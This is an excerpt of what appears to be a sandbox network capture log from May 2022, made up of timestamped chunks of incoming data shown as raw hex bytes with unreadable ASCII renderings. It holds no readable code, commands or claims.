                                                                                                                                  2022-05-12 17:41:27 UTC137INData Raw: 06 ed 30 06 e0 4b 4f 70 06 59 cf 75 f1 fd b3 d8 7a de 8e eb df 07 77 de 1c 84 c9 d0 1c d2 a1 be 43 cf 40 27 1d b8 3f c2 8d 13 3f ad cf 21 d3 84 30 43 a8 f7 78 71 3e 8d f2 56 fa df 02 80 08 e1 71 4d dd 66 d5 14 64 b6 18 bd ea 6d f7 dc 64 ba e0 f1 8d db 5b d5 82 0c 0f e4 de fa b0 e5 7f 64 43 90 f5 5b 53 a9 3a 0e e9 fc 27 35 72 24 8f 2a 2b 66 e0 09 61 e9 8c 29 8e e8 44 f9 7a 7c ae 2a 9b e2 9f a0 8c 37 36 d7 f6 35 0d 50 f7 11 da 2b 01 40 75 7b ad 63 2b 35 ad 32 07 a7 ad 14 e2 9d c7 2a 76 d7 7a 16 03 d6 fc 67 bb 49 f0 9b fa 18 47 6f 62 77 42 2b cd 80 64 ef d0 aa ff 8a c5 45 31 02 12 18 40 f5 29 45 87 00 9a 0b 84 af e2 a8 cf 23 6f 2d c4 ba 36 82 b4 03 75 2f eb 0e 19 ce 69 ca 6a b5 ad 42 3e 98 32 0f 3f 6a 8f be a7 5f cd 7c 02 31 05 93 da 42 5d dd 5b 56 57 c3 20
                                                                                                                                  Data Ascii: 0KOpYuzwC@'??!0Cxq>VqMfdmd[dC[S:'5r$*+fa)Dz|*765P+@u{c+52*vzgIGobwB+dE1@)E#o-6u/ijB>2?j_|1B][VW
                                                                                                                                  2022-05-12 17:41:27 UTC138INData Raw: db 16 2c e2 1a 14 4f 46 c2 19 d7 49 2a a3 71 f5 32 23 8e 55 51 d6 30 7c 51 f4 97 a6 34 f1 0e 08 fa 7c f1 c1 26 7c 5d 32 c5 74 99 46 95 ea eb 81 27 52 26 32 91 27 4b a5 51 a0 83 5a 04 1f 50 17 58 e4 c1 e9 98 d6 4f 68 f4 c8 87 b8 27 83 ad 94 68 c2 8f 62 fe 52 0e 15 ee af 8d 43 a6 85 91 74 45 c8 a2 06 8c dc c8 66 a6 76 db 42 de 27 17 29 7c f8 9d 46 e7 c6 c5 91 78 2d 04 ba 7f b4 f1 01 6f be d6 76 38 4d f7 52 3a af da d5 18 de c7 a6 b4 18 68 51 72 4f 10 b9 4a ba a9 29 72 1c 18 a7 28 2a 2c 77 96 5a fd 25 1f 0c 4e 5a 15 f0 38 9e 14 2a 7f d4 1d fb 98 b1 f1 f4 87 cd 9b e6 c3 ff f0 a0 fe ca ac bb a6 d4 e3 7f 21 45 9d c0 c4 74 2e 3e 59 7f 3c 72 69 51 2b 77 cb 98 7a e7 1d 0c 1f 57 fa a2 14 53 b5 14 08 11 d6 06 14 f1 c4 d8 22 c3 27 20 48 7b 66 a9 bb 5f 91 a3 a1 9a 56
                                                                                                                                  Data Ascii: ,OFI*q2#UQ0|Q4|&|]2tF'R&2'KQZPXOh'hbRCtEfvB')|Fx-ov8MR:hQrOJ)r(*,wZ%NZ8*!Et.>Y<riQ+wzWS"' H{f_V
                                                                                                                                  2022-05-12 17:41:27 UTC140INData Raw: 15 41 4b 42 b9 d9 0e e0 b2 a6 d4 c7 a8 e6 a2 1c 78 2e 04 38 85 34 bc d1 44 83 26 7f 8c fa ce 79 8d e6 12 51 0f 0b bb ac a7 b9 f6 48 0f f3 17 31 37 48 8c 73 9f 2f 23 54 b1 cb 0a 1f bc a4 3c d9 a4 e9 51 17 37 3c 41 db 42 c7 d8 9a 5c 71 e3 24 a7 29 06 43 18 d3 f2 b1 48 29 bf d6 55 60 e8 6d c6 a1 80 9b f4 06 90 4d cc 9a 77 0f b9 c4 71 80 b9 ad 38 6c 20 19 44 87 48 ac ef 60 51 b4 ca 5e 8b b7 dd 41 91 b5 08 ac 3a 7e 3a cf 67 a0 4e df 8b 7c 84 af a9 fb 8e d9 b8 6e d4 ee 41 63 27 62 3a 5a 0b 02 4f 6d 8c bf d1 e4 9a f8 35 67 64 54 cd b6 0a 5b 46 a3 b6 7f cf c4 ea 8e 79 e9 37 b3 f9 3a b6 59 99 eb 3f b6 d5 e8 fa 28 6a 87 db c6 0a 6a e6 10 de 5c 1b 4f 87 07 35 b9 e3 82 bb 12 89 61 0b 25 e9 94 4a 27 f5 6b 9c 67 f4 69 48 05 2e 95 d9 81 ff 6b d5 b1 fd 99 16 de 71 c7 af
                                                                                                                                  Data Ascii: AKBx.84D&yQH17Hs/#T<Q7<AB\q$)CH)U`mMwq8l DH`Q^A:~:gN|nAc'b:ZOm5gdT[Fy7:Y?(jj\O5a%J'kgiH.kq
                                                                                                                                  2022-05-12 17:41:27 UTC141INData Raw: 38 9f 4a 7e d4 39 51 bb b3 f1 ea 35 11 b7 f4 e3 f5 4c dc 9f cb 8c 8f a7 22 e2 60 0b f7 41 ec d5 54 24 4e 26 1e 3d 52 ff 6c 14 75 d5 b0 19 c3 30 18 13 f1 bb c1 15 53 91 6e de 10 d6 19 a7 fc 10 cb 04 e5 fa a3 36 1a 47 33 a2 7f d1 be ac b2 35 25 a6 1f 3f d3 ac ee 06 6e d2 1b eb df d4 3d 1a a2 04 e5 81 75 1f 47 6d e2 64 1e 0a 56 57 78 eb 15 d8 f7 8c ab 19 65 d8 30 fc de bd 34 af 4a c6 97 c9 7f b3 6c 1a 51 57 80 3a af 9a 23 fc 41 cf ec aa 23 57 7c 44 41 62 7b 06 74 d1 6d b2 71 61 c1 87 de 0e ff 76 d8 30 28 31 cf 7c d3 a5 9a 20 07 41 27 87 07 37 fd b9 15 5c 65 ce 21 f3 3d a1 58 a8 e8 6b 49 ef 75 f3 50 d6 77 fa 9f 68 e0 75 69 b9 af d4 14 fe 09 10 81 de 6b 93 15 65 ba c0 74 6c c0 5b cc b5 fa 26 1d d9 d0 34 b1 98 1b 22 95 d5 1a 71 65 3b 94 cc 4b 13 3e 40 47 ad e6
                                                                                                                                  Data Ascii: 8J~9Q5L"`AT$N&=Rlu0Sn6G35%?n=uGmdVWxe04JlQW:#A#W|DAb{tmqav0(1| A'7\e!=XkIuPwhuiketl[&4"qe;K>@G
                                                                                                                                  2022-05-12 17:41:27 UTC142INData Raw: 66 ee b8 d3 46 44 a5 9c d9 d9 ba eb 8e 62 c2 7a 48 f8 3a 2a 56 36 87 78 97 b0 ee da 35 48 57 ff 5c 2f 58 fd 1e 07 40 19 49 ad a1 38 c7 e2 82 a3 1a 16 62 0b 23 59 37 19 54 d2 4b fe 45 ea 6b 68 df 90 b0 f4 8c f6 63 32 b2 fd 9f 1c 21 10 a6 ae 43 bf cb 89 a3 d9 61 c8 1d 42 3a ce b4 69 ee b2 8e 22 f2 5a 83 d3 f0 e1 26 c9 59 80 a0 51 65 b8 1e 51 e9 d9 61 2f ca e5 06 12 f6 8b 9c 9f 8a 17 6b a0 52 fa 10 05 65 ee 01 2f 06 d8 d0 90 06 f1 94 c8 a6 36 06 6d 46 5b 1a d7 49 90 b6 41 e4 14 1c ff 7f a8 d7 10 67 5e 76 e9 db 1d 08 0b 28 0d 57 77 bf dd 58 70 27 c3 3e 6a 47 95 70 ee e4 28 74 06 45 bb de 4a 85 74 af 01 24 7a 37 78 ea 79 16 c6 c3 1e 32 0b 44 e5 ea 87 21 24 83 ad 2e 02 f2 9d 44 c2 11 f5 14 ee 89 eb e0 d8 e4 8f 5b 69 11 50 07 8a f6 d4 3d ea 65 fd 66 0d 4a 15 29
                                                                                                                                  Data Ascii: fFDbzH:*V6x5HW\/X@I8b#Y7TKEkhc2!CaB:i"Z&YQeQa/kRe/6mF[IAg^v(WwXp'>jGp(tEJt$z7xy2D!$.D[iP=efJ)
                                                                                                                                  2022-05-12 17:41:27 UTC144INData Raw: 61 05 41 07 29 05 1a ef 81 1d e6 66 ce 27 f9 22 fe 39 a9 f7 63 41 9a 76 f3 56 66 d0 a9 ec 4f c0 fd 4b fd ad f4 28 43 2c 3d 8f e9 63 2e 16 65 bc ca 57 33 a1 5a d5 99 23 aa 1f df fa 2c ea d4 08 04 b1 78 5d 73 65 1b 43 ce 66 02 07 40 2a 56 e7 2a 60 ca ab d0 93 8d 29 95 c1 e2 02 7b 7c 32 25 30 8d d8 81 02 31 16 1a d7 58 2a ca d2 20 e0 f4 20 8d 72 51 2f 3d 92 2f ad 36 38 24 87 ed e3 07 e4 2d e5 8f 3b 98 01 d2 dc 89 c9 6e f0 01 c2 1d af 48 42 bf 69 ad b3 c1 81 f4 d4 8a 76 a0 3c 44 ab 21 15 88 18 b4 b8 47 83 20 75 70 a3 af 78 92 ee 1a b0 0c 0b bd 1c 04 ea 85 6f 2f ef 35 a0 35 68 ca f6 ba 02 2e 79 b9 a3 09 1f ba ae 38 80 c5 e8 4e 05 3f dc 42 db 44 77 7f c9 2c 56 c3 39 85 bb 04 63 49 56 d7 9c 45 27 66 45 57 66 c2 cf 24 e7 81 9b e7 0e 73 4e cc 9c c7 a8 ea b4 56 a0
                                                                                                                                  Data Ascii: aA)f'"9cAvVfOK(C,=c.eW3Z#,x]seCf@*V*`){|2%01X* rQ/=/68$-;nHBiv<D!G upxo/55h.y8N?BDw,V9cIVE'fEWf$sNV
                                                                                                                                  2022-05-12 17:41:27 UTC145INData Raw: 09 7d f1 5b 99 74 62 05 c3 e6 6a 47 95 ca b4 e0 3a 52 39 22 91 27 4b a5 51 a0 87 5a 04 1f 50 17 58 a5 c2 e9 98 d6 4f 68 f7 c8 87 f9 24 83 ad 94 ab f6 8f 62 fd 6e df ed ef a9 a1 ef 5e 9a f1 75 41 ec 71 b3 8e dc 52 d9 ae 49 ef 44 0d 92 15 29 5c 8d 20 6f e7 d9 d3 ad a9 d5 05 bc 53 18 09 1e 0f bf d2 52 ec f9 f5 52 a0 10 d2 ea 2c d8 13 12 b6 18 48 2f db 66 10 a6 79 85 78 d1 73 1a 34 0f d0 35 4c 76 92 7e 28 92 1d 0c d4 e5 1d cc 0c 98 c1 9d 7d d4 3d 51 4e 98 f1 ea b0 17 b2 1f c4 d5 74 f4 19 b5 cd be 86 26 c2 c8 23 df b8 77 f0 7f 1c ee 78 c8 3e 52 fb 6c c5 5e d5 b0 9c ed 35 f3 34 d1 82 e9 93 2d d0 35 ff 14 f6 be 8c d4 e9 50 21 ce c2 07 68 c3 44 33 a6 7f 68 95 ac b2 b0 19 a3 f7 18 f3 ea c6 80 10 93 99 ca db f4 9a 30 5b 05 7f a2 72 8f 1f 2c 5a 66 1a 2a 37 47 52 eb
                                                                                                                                  Data Ascii: }[tbjG:R9"'KQZPXOh$bn^uAqRID)\ oSRR,H/fyxs45Lv~(}=QNt&#wx>Rl^54-5P!hD3h0[r,Zf*7GR
                                                                                                                                  2022-05-12 17:41:27 UTC146INData Raw: 05 ad 8e eb 0e 34 78 48 a4 7b e3 5c 5a 7d fb fb 61 8f ca e5 06 a8 6c 8c 8e b9 b5 3f 41 59 53 da 02 0a e7 90 7f 27 2e 25 f1 59 02 db 16 2c e2 1a 17 4f 46 fb 1a d7 49 2a 6c 46 f5 32 24 be 84 a9 d7 36 50 f9 08 88 c6 35 f5 2a e2 09 7d f1 5b 99 74 61 05 c3 9e 6a 47 95 ca ca e2 3a 52 3e 07 40 df 4a a3 7d 0c 7f 45 64 1e 54 33 b3 14 c0 e9 02 69 47 57 c3 ce 6c 48 26 83 8d b7 0c df 8f 7d b3 52 0e 15 ee af 8d 43 a6 85 91 74 45 c8 9d 05 8c dc c8 66 a6 76 db 42 e1 24 17 29 7c f9 ab 46 e7 c6 c2 91 78 2d 04 ba 7f b0 f1 01 6f be d6 76 01 4e f7 52 3a af da d6 18 de fe a5 b4 18 68 6d 44 4f 10 bb 4e 6b 51 28 74 30 b0 5b 37 4a 2d 73 b2 b4 0a 24 1f 96 f1 52 29 c7 3e 70 e3 2b 7f f4 54 5a 85 b1 ed c2 56 35 9a e0 ef 57 0c bf 9e cb a8 9f 49 20 e2 7f bb fa 95 fc f3 72 c1 ca 58 7f
                                                                                                                                  Data Ascii: 4xH{\Z}al?AYS'.%Y,OFI*lF2$6P5*}[tajG:R>@J}EdT3iGWlH&}RCtEfvB$)|Fx-ovNR:hmDONkQ(t0[7J-s$R)>p+TZV5WI rX
                                                                                                                                  2022-05-12 17:41:27 UTC147INData Raw: 63 31 16 1a 6d 10 20 db f4 1c 27 0f 21 8d 54 18 81 43 f3 36 85 cb 19 ab 83 c7 61 e3 a0 01 f4 ad 3b e7 01 d2 dc 33 9f 64 e1 27 ff c5 54 49 42 99 26 07 cd a0 9b dc 29 ab e6 a4 16 c6 4f 65 39 9a 3a b4 d9 47 83 20 cf 2f a9 be 5e ad 13 30 49 0d 2b d1 1a 82 94 ff 46 d6 ea 15 37 1d ee b4 0d 9e 2f 38 7f 6b 30 0b 1f 20 ab 93 b5 e3 c8 a3 11 17 25 63 b4 6e 5d fd a8 47 7f 3a 3c a5 2f 2c e1 37 ad f3 b1 50 21 b5 d5 55 66 58 ca 95 d1 a7 bb 03 24 8a 4f ec e3 c1 2a 94 cc 7f 59 a2 af 3e 46 82 30 3a 86 48 b5 e7 6d 52 b4 cc ee 28 e4 ad 66 b1 45 2a b7 38 5e 46 79 42 8d 46 d1 52 66 86 a9 83 5d ae a7 b9 6e cf c4 9c 98 26 62 a6 55 a0 6e 08 4c 79 b9 f1 f8 b8 78 19 fd 41 66 cf b8 d3 46 44 a5 9c d9 d9 ba eb 8e 62 c2 e9 48 f8 3a 2a 56 36 87 78 97 23 ee da 35 48 17 f7 5c 2f 58 e1 1e
                                                                                                                                  Data Ascii: c1m '!TC6a;3d'TIB&)Oe9:G /^0I+F7/8k0 %cn]G:</,7P!UfX$O*Y>F0:HmR(fE*8^FyBFRf]n&bUnLyxAfFDbH:*V6x#5H\/X
                                                                                                                                  2022-05-12 17:41:27 UTC148INData Raw: ad 78 cb 6c 85 fc c3 fc 07 3b ea 32 3f 95 d7 93 a0 8c 85 30 e5 0a 8c c8 92 ec f4 a1 c0 93 fd a5 5b f6 87 f2 c1 d4 17 eb ee 04 f9 59 1a 98 d2 7b 80 c3 64 50 46 5a 0a 8e 64 39 10 09 96 7c 2f 31 5e 43 61 8c 4f 8f d9 25 59 27 5d d5 8b 49 c5 ae f3 93 28 9c a8 f0 04 62 44 22 9d ba 83 62 3e 42 d4 8e 24 ab 60 92 1f ce 1d 71 4c 76 ed 4e 70 81 ea cb b8 d1 44 a9 66 1a 08 5e 42 fa 6c ab 8f 41 42 5b a7 ca 5e 72 32 6d 6e 67 6d 4d 10 ad c7 1d c4 3b 4c ac 29 53 7f 0e 52 61 e0 87 a6 85 94 87 26 28 92 4e b8 a5 4d 4e f9 2b ab 8b 16 16 d3 08 49 eb 16 87 55 c7 ed 27 d8 36 b8 9b 5b 25 47 51 4f 43 51 08 21 54 c4 d7 fd 4b 6b d1 82 dc f7 e5 75 c1 45 e1 48 a7 74 c3 fa fc 7e 12 56 2d 42 3d 08 f1 83 37 53 33 9a 65 96 8c aa 26 d7 9b 16 56 0b 57 d7 73 e8 c3 be 86 03 dc 45 7f d0 cd b7
                                                                                                                                  Data Ascii: xl;2?0[Y{dPFZd9|/1^CaO%Y']I(bD"b>B$`qLvNpDf^BlAB[^r2mngmM;L)SRa&(NMN+IU'6[%GQOCQ!TKkuEHt~V-B=7S3e&VWsE
                                                                                                                                  2022-05-12 17:41:27 UTC149INData Raw: 08 69 e1 31 bd a8 f7 d7 da 1a 9c 3d 7b a3 45 6e 6c 37 34 22 55 85 36 4d b8 3d cc 8c ce 90 65 94 cf 93 65 06 34 43 6e 0a db 01 b3 84 2b 23 92 bb a5 3d 2d 8d 61 1a 5d 09 c9 46 bd cf 37 bf 38 fa a2 0c d1 3d 70 37 4c a7 e6 13 47 c0 ba d4 72 e7 57 d8 bd e1 3a 9e e8 18 4b 1c 29 93 d2 d4 a3 94 69 ae 9b c2 7a dc 29 ff 58 ce e8 89 26 13 51 35 69 0f 94 cd b1 c5 6a e2 2c 8b d0 31 ef a3 ec ec 92 28 1b 65 31 78 b6 c5 56 fb d2 f1 75 99 1f f6 b4 a0 bd 4b 50 35 fd c5 05 8e a3 0b 0d b8 b3 2b 26 bd 89 6d cd 8e cc e0 d6 dd 02 0d e7 21 bf 63 5c 60 eb 2a 0a 38 3e d1 92 10 dd 04 8b f2 24 03 7e 68 3c 10 ef 47 05 9d 7e f1 24 28 bb 59 aa cd 16 73 63 7d ff d6 54 d7 37 0f 2f 44 c9 fe 82 30 78 34 95 68 55 39 a2 de bb f6 04 2f 04 0a bd e9 6d 6a 99 4c db e2 a5 c6 94 dc ba d1 04 60 55
                                                                                                                                  Data Ascii: i1={Enl74"U6M=ee4Cn+#=-a]F78=p7LGrW:K)iz)X&Q5ij,1(e1xVuKP5+&m!c\`*8>$~h<G~$(Ysc}T7/D0x4hU9/mjL`U
                                                                                                                                  2022-05-12 17:41:27 UTC151INData Raw: 93 e1 20 c8 0e d9 49 68 e2 6b ad 23 05 db ed b4 96 91 96 fc 81 fe 86 26 07 17 ee e8 5e 0e 6a 59 7c fb 49 89 3b db 28 e9 46 3e 25 bb cd 8f e8 c4 9a 86 78 20 a2 ba e4 48 b1 78 02 01 f5 27 4e c4 c5 b0 f3 5a e4 51 65 32 52 c7 5e da b0 12 7f 02 85 d9 98 cd 2f 41 e8 6a a1 2a b1 bb 8c 07 80 02 8c b2 2a 43 53 8b b0 f3 84 b7 62 7b c6 a8 05 23 3d 6d 7f a0 04 40 4e 26 43 d0 9d 02 5e e3 2c e1 90 e0 5e e3 8f 06 57 10 0b c6 3b 3c b5 d5 8f 9d 24 47 66 88 4f 72 b8 87 5c d6 0e 2c 8a 6e 7d a2 4f e5 24 a2 3d 5e fd ec 82 eb 93 d7 18 f9 b2 06 0f 1c ce c2 f8 fd 33 8e 31 ed 0a 51 52 5c 99 7d 12 af 82 b5 c1 f9 e0 a8 8f 07 6c 01 38 02 a6 0d a7 0e 64 bc 1d 73 3c a3 89 a5 49 38 ff c7 87 cf 77 e7 49 11 48 c2 cc 2e c4 ea c8 b9 01 b7 43 e7 ee 9f 53 a2 9f dd 62 48 6f 44 3c 45 84 d9 f9
                                                                                                                                  Data Ascii: Ihk#&^jY|I;(F>%x Hx'NZQe2R^/Aj**CSb{#=m@N&C^,^W;<$GfOr\,n}O$=^31QR\}l8ds<I8wIH.CSbHoD<E
                                                                                                                                  2022-05-12 17:41:27 UTC152INData Raw: c2 be ef 74 c0 9b b5 ac 4e 2e d4 68 83 31 52 8f b6 e0 f8 b8 c1 6d d7 82 0f db 76 ab ae 40 da 2e 4b 8c d0 d0 c6 07 4a 8b 53 bf 98 ae ce 72 76 11 ff 8a a8 49 e4 c0 f9 2a 4e 39 58 98 ec 87 8b 08 79 3c db 0c c6 5d 2b 0d 52 06 51 19 5a 8f a9 d3 28 3d 17 ba b8 c5 20 69 db ed a7 53 8f cd 34 95 2a 93 6b a4 d2 c6 bd a7 8c e0 34 24 87 23 42 fa b6 3f 2b f6 0f bf 28 42 5e 77 1a 08 dd e2 30 b0 a3 c5 91 86 26 29 bc 5a 1c 82 60 52 9d c6 5e df 5a e8 5b 84 a6 fa dd 30 a3 05 b5 b0 08 7d 10 7e 5e 35 99 6d b3 7b 03 51 23 2c 33 65 6f 19 10 92 5e 26 1e 02 39 ef 4d 01 d2 38 9e 91 38 5b ec 1e 57 4a 68 1c 2f 64 f6 53 25 13 05 f2 3d 4b 03 7f 69 59 eb 06 93 ec 05 76 70 23 80 ca 18 a5 a7 e5 82 05 a6 e8 91 36 5a 7b 0a c3 dc c6 35 70 64 d5 b7 5f ce 34 e5 2d f0 62 27 12 2b b4 44 00 d3
                                                                                                                                  Data Ascii: tN.h1Rmv@.KJSrvI*N9Xy<]+RQZ(= iS4*k4$#B?+(B^w0&)Z`R^Z[0}~^5m{Q#,3eo^&9M88[WJh/dS%=KiYvp#6Z{5pd_4-b'+D
                                                                                                                                  2022-05-12 17:41:27 UTC153INData Raw: 89 91 95 11 6e 1c 09 88 31 f2 2d d0 a7 b0 cc 4d a3 dd 4c 51 71 1f 56 5c 12 4d ca aa d8 e2 df 7e db 02 bf a6 10 c3 b7 89 38 eb 37 ca bc 6f 46 76 43 fb 35 f2 d4 b1 3a 7c a1 5d 6e 2f 12 86 36 c7 77 60 18 c0 62 51 19 bb 8f f1 9e fe a5 6f 31 58 1e 75 ec 6f 68 be 86 0f 7f e1 65 f8 06 35 49 65 e7 d9 90 73 22 16 f9 78 4a ee d3 b9 c7 8b 9b eb 38 c8 6f de 9e ef 28 9e c4 44 ba b7 f6 16 7a 1f 58 4c 86 18 90 c3 81 50 a4 e5 4b 2a f2 c6 4d 9b c8 29 c0 4c 0d 51 2b 44 f0 47 8f c7 0f 99 c0 d8 c4 b1 ad d8 12 d9 f7 09 8e bb f9 a0 9d 67 91 b0 f9 79 7d 33 79 7d 2d f4 3c 9e ac 13 40 f5 94 8b 29 33 ae 54 5f 64 0b 90 7a d3 f1 31 85 13 c8 d2 29 e9 19 61 28 64 82 c1 34 70 f0 84 e8 2b 9f 24 ef c9 ee 2e e1 b9 5f 13 78 3a a2 b8 ca 97 a9 4b 9a b8 d1 7d eb 12 d3 4b b8 8b ba 7b 71 39 54
                                                                                                                                  Data Ascii: n1-MLQqV\M~87oFvC5:|]n/6w`bQo1Xuohe5Ies"xJ8o(DzXLPK*M)LQ+DGgy}3y}-<@)3T_dz1)a(d4p+$._x:K}K{q9T
                                                                                                                                  2022-05-12 17:41:27 UTC154INData Raw: 7f 8e f8 d5 b3 a1 6e fc 88 52 be 1a 55 8f f7 70 89 28 dd e9 b0 b6 e1 6b d2 f9 ce db 78 d1 e4 8e ea e6 d2 6f b5 35 6c 80 f6 b2 92 12 60 8d 0a 39 7f 3d 82 25 46 1d a8 d9 fd 97 7f 69 57 b8 f6 a9 64 15 da 4d 95 7d be 75 e1 a2 89 ae 7a 87 a2 47 3e 6a 05 75 e5 18 d2 f8 ef fa e5 1d c2 46 54 be ca fa 1c 61 f8 ab d4 ca c5 22 28 4c 1a fc 9e 58 db 5d 33 d3 59 79 48 76 15 30 86 c2 b6 f3 b8 a3 19 1d f5 1b e1 c1 1d 28 b6 7d ed 9d 18 58 90 6a 17 14 f2 25 f7 45 54 dc 55 8d 03 2f fa 80 9f b8 a8 ac e8 a4 cd 8b 02 0d 7b 90 97 3c 6c 10 12 05 85 1d dd 63 9a 7c b6 26 42 7c ae d6 9c f4 ea c2 fe 01 61 df da 9a 3e d3 28 5f 74 e6 5d 18 9e 91 ed ed 6d cd 70 69 05 73 e9 67 af 94 6c 2a 40 83 f6 b9 b4 0c 3c 93 60 9f ae 03 69 79 d4 75 c4 49 1c bd 9c ef 39 1b 3d 7a 5a 9c 8f 22 1a fa db
                                                                                                                                  Data Ascii: nRUp(kxo5l`9=%FiWdM}uzG>juFTa"(LX]3YyHv0(}Xj%ETU/{<lc|&B|a>(_t]mpisgl*@<`iyuI9=zZ"
                                                                                                                                  2022-05-12 17:41:27 UTC156INData Raw: 57 1e e8 fe a4 aa da ae 4c b4 1f 33 90 cb 67 08 57 e9 e8 03 aa 9e b8 c8 25 8d 66 7c cd 47 da 0d 60 f2 2f e8 bd 9a e3 0d 42 ee a5 36 40 3c 9a 75 8a 23 34 63 e5 54 23 c4 93 9a 93 22 76 7c 10 71 92 5f 24 43 e7 7b 9a 51 d0 61 5c 0f b9 f0 b7 9c c1 4b ce a6 fe b0 34 a0 7e ff bb 65 93 c8 c4 d3 a8 0c 62 1d 5c 18 ca a2 14 c3 9a b3 29 fa 4e be e3 d8 87 62 12 6b a5 84 4b 3b 32 a2 8a 22 00 b2 9a 0b 35 d5 5e 1a 73 4e 22 2c eb a2 7c 9e 13 dd ef 88 28 dd f2 ea c9 15 44 f9 23 e9 50 3b dc b4 a2 b0 e1 df 33 bb f9 72 9b 27 e2 e1 56 bc 7b 04 ee a9 a4 b9 35 10 e1 2d d6 8c a5 c9 4b 60 15 e1 ca 80 52 f1 d5 f7 1b 7a 4f 5f b6 cf ad ba 35 7e f3 02 e7 32 bb 97 cb b5 e6 8c e1 8c 4c 69 03 df f2 d4 63 7c 3a df ae 01 3c 39 bd 55 13 e0 6b cf 5e a7 51 0e 13 61 64 43 19 1a 3f 83 2d 7a e6
                                                                                                                                  Data Ascii: WL3gW%f|G`/B6@<u#4cT#"v|q_$C{Qa\K4~eb\)NbkK;2"5^sN",|(D#P;3r'V{5-K`RzO_5~2Lic|:<9Uk^QadC?-z
                                                                                                                                  2022-05-12 17:41:27 UTC157INData Raw: aa 18 91 7b d4 31 ce 02 bb f3 f6 33 37 0f 4f 6a 53 53 b9 d3 7c 49 17 a1 48 88 d9 f3 26 d3 89 1d 13 2f 7a e9 49 f7 e8 b8 dc 5b b0 41 49 e8 b9 c7 1e 6c 33 03 86 fe 59 ca 03 7b 95 df d0 5e c5 4e 80 9a 29 06 38 cd fa 8a e7 c9 38 42 9d d2 71 5b 7c 16 34 df 5b 72 23 5d 2b 92 c5 1f 45 d7 44 b5 d7 43 f0 58 68 8f ce be bd 56 f3 d2 5e 37 6b 49 ff c0 fd 2e ef d0 1a 1b ef 0e cd bf 55 ac a5 49 b9 29 f5 44 c8 e5 77 44 34 31 4e 20 f2 01 7d d2 c6 c9 19 2b 53 4b 9b 0d f5 21 f4 a3 b9 b8 78 99 fd 07 7f 46 65 6d 0a 4c 1b 89 e6 83 a0 82 2a b5 06 e4 8a 48 eb e5 9a 1c 37 d6 2c 77 a2 d3 ac b1 0d a0 1e 35 43 f6 ae 64 ec a1 91 c9 67 fc 16 a8 d9 b6 6c 92 81 8e 23 06 34 34 44 7d dc 97 a5 90 fa a7 27 36 88 ef 0c 18 9d 7a f4 7f 42 37 3d a7 91 df 38 78 2d ac 36 08 9a bc e7 a6 fe ee 9b
                                                                                                                                  Data Ascii: {137OjSS|IH&/zI[AIl3Y{^N)88Bq[|4[r#]+EDCXhV^7kI.UI)DwD41N }+SK!xFemL*H7,w5Cdgl#44D}'6zB7=8x-6
                                                                                                                                  2022-05-12 17:41:27 UTC158INData Raw: a5 56 0c 4b 37 a8 94 1c cf 4d 73 52 26 ac 9a e5 02 25 78 ba 74 4c 63 b5 ca f7 f5 0a 62 12 1b 89 ee 76 99 77 aa 25 00 45 3e 4c 0f 68 06 d4 c7 b6 62 4c 63 c3 c8 89 64 08 ad 9b 82 11 e9 a1 4c cc 54 d1 32 c8 8f 89 eb f6 84 7b e8 d8 20 9d cb e3 d6 94 85 4d a2 9f 5a e1 47 1c fb 8e 7f 52 94 35 0b bd bc 41 ec c0 78 24 18 71 9e 25 8b 2a ae 38 b8 0f e0 12 38 45 75 8c 4c 91 05 1c de fb be 8d f3 c2 16 d2 26 98 99 cc a7 f1 95 c5 ff be c4 02 b0 d1 fd d3 d1 0c b7 e3 2f d9 48 13 f2 ee 1d f9 bc 41 74 35 29 32 a1 23 24 6c 2b 86 76 23 76 01 0b 7a dd 46 d7 84 6c 42 14 7c fd a4 78 e8 c7 de b3 06 ec 8f d4 6a 09 30 0d 0b 45 7c 8c cb d2 05 51 f7 76 ab 50 ce 72 cb 97 b2 83 55 fa ac 6c 1b 31 07 65 e4 4e 8a e8 f7 e9 d3 6e f1 73 37 84 8d 8d 35 4d df ea ec f5 bf 06 0a 1c 7b 95 e1 25
                                                                                                                                  Data Ascii: VK7MsR&%xtLcbvw%E>LhbLcdLT2{ MZGR5Ax$q%*88EuL&/HAt5)2#$l+v#vzFlB|xj0E|QvPrUl1eNns75M{%
                                                                                                                                  2022-05-12 17:41:27 UTC160INData Raw: 13 1a 0f 57 83 82 5f 84 a3 bd 78 34 c1 bc 6e 1f 0b 10 11 50 b1 f6 6e 64 f7 c7 14 25 68 0a 79 11 08 2e 5f de 1a b9 09 a8 8e 10 82 77 fe 43 13 9a 2f f1 cd 50 5d 92 9f ff 41 d1 3d b0 27 bd 6f 5b cc 40 98 da 26 54 d7 84 7c 79 e3 aa c0 11 81 42 30 8c 4f bc 9a 9a 3c 86 d5 d7 89 2d 88 32 6c b3 5c b2 a6 4e b1 2f 99 16 ac ca 74 a3 d1 fa 58 83 b1 1a ad b1 76 3c 55 d5 ad ce dd ad 67 b7 ae ef c3 c2 c6 d7 60 42 ec 32 9b 40 78 3c 70 87 7c d6 73 fe 9a fb f8 6c e4 47 dc 47 79 3d 8d 6c 5f 52 a3 fd 7e 2f c8 fc 8e 8f fc c4 58 ee 3a 77 6c c0 87 48 b7 e7 c9 01 27 7e 87 43 40 f4 55 e1 36 a2 5c 91 5c 91 27 b0 b7 6b 91 b1 3a e6 6b 83 30 d5 12 fe 6e 7c 78 96 47 0f 73 0d 21 a2 b0 8f 99 51 58 dd b3 98 bf ed b5 68 c7 98 42 52 c7 f4 a1 97 44 00 10 75 28 9d 8e 5c c4 a8 8e 1a dc 2d ab
                                                                                                                                  Data Ascii: W_x4nPnd%hy._wC/P]A='o[@&T|yB0O<-2l\N/tXv<Ug`B2@x<p|slGGy=l_R~/X:wlH'~C@U6\\'k:k0n|xGs!QXhBRDu(\-
